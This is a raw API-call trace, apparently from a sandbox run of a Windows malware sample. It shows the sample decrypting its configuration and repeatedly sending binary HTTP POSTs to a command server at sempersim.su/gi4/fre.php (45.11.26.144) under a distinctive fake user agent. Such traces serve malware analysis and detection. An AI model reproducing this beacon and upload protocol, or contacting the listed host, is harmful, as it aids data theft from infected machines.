HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2fa8 | out: hHeap=0x5b0000) returned 1 [0292.103] GetProcessHeap () returned 0x5b0000 [0292.104] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2f60 [0292.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.105] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0292.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.113] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5aa8) returned 1 [0292.119] GetProcessHeap () returned 0x5b0000 [0292.119] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0292.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.120] CryptImportKey (in: hProv=0x5c5aa8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0292.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.121] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0292.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.122] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.122] GetProcessHeap () returned 0x5b0000 [0292.122] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0292.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.123] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2f60, pdwDataLen=0xdfcfc | out: pbData=0x5d2f60, pdwDataLen=0xdfcfc) returned 1 [0292.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.124] CryptDestroyKey (hKey=0x5be288) returned 1 [0292.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0292.125] CryptReleaseContext (hProv=0x5c5aa8, dwFlags=0x0) returned 1 [0292.125] GetProcessHeap () returned 0x5b0000 [0292.125] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0292.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0292.128] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0292.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0292.129] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0292.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0292.129] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0292.129] GetProcessHeap () returned 0x5b0000 [0292.129] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0292.129] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce150*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0292.131] GetProcessHeap () returned 0x5b0000 [0292.131] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa40 [0292.131] socket (af=2, type=1, protocol=6) returned 0x3fc [0292.131] connect (s=0x3fc, name=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0292.199] FreeAddrInfoW (pAddrInfo=0x5ce150*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0292.199] GetProcessHeap () returned 0x5b0000 [0292.199] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0292.199] GetProcessHeap () returned 0x5b0000 [0292.199] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0292.200] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0292.201] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0292.202] GetProcessHeap () returned 0x5b0000 [0292.202] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0292.202] GetProcessHeap () returned 0x5b0000 [0292.202] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0292.202] GetProcessHeap () returned 0x5b0000 [0292.202] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e88 [0292.202] GetProcessHeap () returned 0x5b0000 [0292.203] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0292.203] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0292.205] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0292.205] GetProcessHeap () returned 0x5b0000 [0292.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0292.205] GetProcessHeap () returned 0x5b0000 [0292.205] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0292.205] send (s=0x3fc, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0292.206] send (s=0x3fc, buf=0x5d1e18*, len=159, flags=0) returned 159 [0292.206] GetProcessHeap () returned 0x5b0000 [0292.206] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0292.206] recv (in: s=0x3fc, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0293.706] GetProcessHeap () returned 0x5b0000 [0293.707] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0293.707] GetProcessHeap () returned 0x5b0000 [0293.707] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e88 | out: hHeap=0x5b0000) returned 1 [0293.707] GetProcessHeap () returned 0x5b0000 [0293.707] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0293.708] GetProcessHeap () returned 0x5b0000 [0293.708] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0293.708] closesocket (s=0x3fc) returned 0 [0293.709] GetProcessHeap () returned 0x5b0000 [0293.709] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa40 | out: hHeap=0x5b0000) returned 1 [0293.709] GetProcessHeap () returned 0x5b0000 [0293.709] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0293.709] GetProcessHeap () returned 0x5b0000 [0293.710] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0293.710] GetProcessHeap () returned 0x5b0000 [0293.710] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0293.710] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xcd0) returned 0x3fc [0293.713] Sleep (dwMilliseconds=0xea60) [0293.718] GetProcessHeap () returned 0x5b0000 [0293.718] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0293.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.719] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0293.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.725] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0293.731] GetProcessHeap () returned 0x5b0000 [0293.731] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0293.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.732] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0293.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.735] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0293.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.736] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.736] GetProcessHeap () returned 0x5b0000 [0293.737] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0293.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.738] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0293.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.739] CryptDestroyKey (hKey=0x5be048) returned 1 [0293.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.739] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0293.739] GetProcessHeap () returned 0x5b0000 [0293.740] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0293.740] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0293.740] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0293.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0293.741] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0293.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0293.742] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0293.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0293.743] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0293.743] GetProcessHeap () returned 0x5b0000 [0293.743] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0293.743] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0293.743] GetProcessHeap () returned 0x5b0000 [0293.743] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0293.743] GetProcessHeap () returned 0x5b0000 [0293.744] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0293.744] GetProcessHeap () returned 0x5b0000 [0293.744] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0293.744] GetProcessHeap () returned 0x5b0000 [0293.744] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3110 [0293.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.745] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0293.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.755] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0293.761] GetProcessHeap () returned 0x5b0000 [0293.761] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0293.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.762] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0293.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.763] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0293.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.763] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0293.764] GetProcessHeap () returned 0x5b0000 [0293.764] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0293.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.767] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3110, pdwDataLen=0xdfcfc | out: pbData=0x5d3110, pdwDataLen=0xdfcfc) returned 1 [0293.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.768] CryptDestroyKey (hKey=0x5be048) returned 1 [0293.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0293.769] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0293.769] GetProcessHeap () returned 0x5b0000 [0293.769] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0293.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0293.770] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0293.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0293.770] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0293.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0293.771] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0293.771] GetProcessHeap () returned 0x5b0000 [0293.771] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0293.771] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce010*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0293.773] GetProcessHeap () returned 0x5b0000 [0293.773] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca970 [0293.773] socket (af=2, type=1, protocol=6) returned 0x404 [0293.773] connect (s=0x404, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0293.845] FreeAddrInfoW (pAddrInfo=0x5ce010*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0293.845] GetProcessHeap () returned 0x5b0000 [0293.845] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5998 [0293.846] GetProcessHeap () returned 0x5b0000 [0293.846] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0293.846] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0293.848] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0293.848] GetProcessHeap () returned 0x5b0000 [0293.848] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0293.848] GetProcessHeap () returned 0x5b0000 [0293.848] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0293.848] GetProcessHeap () returned 0x5b0000 [0293.848] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d33e0 [0293.848] GetProcessHeap () returned 0x5b0000 [0293.848] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0293.849] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0293.850] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0293.850] GetProcessHeap () returned 0x5b0000 [0293.850] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0293.850] GetProcessHeap () returned 0x5b0000 [0293.851] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0293.851] send (s=0x404, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0293.939] send (s=0x404, buf=0x5d1e18*, len=159, flags=0) returned 159 [0293.939] GetProcessHeap () returned 0x5b0000 [0293.939] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0293.939] recv (in: s=0x404, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0295.286] GetProcessHeap () returned 0x5b0000 [0295.286] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0295.286] GetProcessHeap () returned 0x5b0000 [0295.286] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d33e0 | out: hHeap=0x5b0000) returned 1 [0295.286] GetProcessHeap () returned 0x5b0000 [0295.286] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0295.287] GetProcessHeap () returned 0x5b0000 [0295.287] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5998 | out: hHeap=0x5b0000) returned 1 [0295.287] closesocket (s=0x404) returned 0 [0295.288] GetProcessHeap () returned 0x5b0000 [0295.288] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca970 | out: hHeap=0x5b0000) returned 1 [0295.288] GetProcessHeap () returned 0x5b0000 [0295.288] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0295.288] GetProcessHeap () returned 0x5b0000 [0295.288] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3110 | out: hHeap=0x5b0000) returned 1 [0295.288] GetProcessHeap () returned 0x5b0000 [0295.288] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0295.289] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xcd4) returned 0x404 [0295.290] Sleep (dwMilliseconds=0xea60) [0295.300] GetProcessHeap () returned 0x5b0000 [0295.300] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0295.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.301] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0295.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.308] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0295.318] GetProcessHeap () returned 0x5b0000 [0295.318] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0295.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.319] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0295.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.320] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0295.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.321] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.321] GetProcessHeap () returned 0x5b0000 [0295.322] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0295.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.323] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0295.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.324] CryptDestroyKey (hKey=0x5bde08) returned 1 [0295.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.325] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0295.325] GetProcessHeap () returned 0x5b0000 [0295.325] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0295.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0295.326] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0295.330] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0295.331] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0295.332] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.332] GetProcessHeap () returned 0x5b0000 [0295.332] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0295.332] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0295.332] GetProcessHeap () returned 0x5b0000 [0295.333] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0295.333] GetProcessHeap () returned 0x5b0000 [0295.333] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0295.333] GetProcessHeap () returned 0x5b0000 [0295.333] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0295.333] GetProcessHeap () returned 0x5b0000 [0295.333] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3158 [0295.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.334] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0295.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.340] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5aa8) returned 1 [0295.350] GetProcessHeap () returned 0x5b0000 [0295.350] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0295.351] 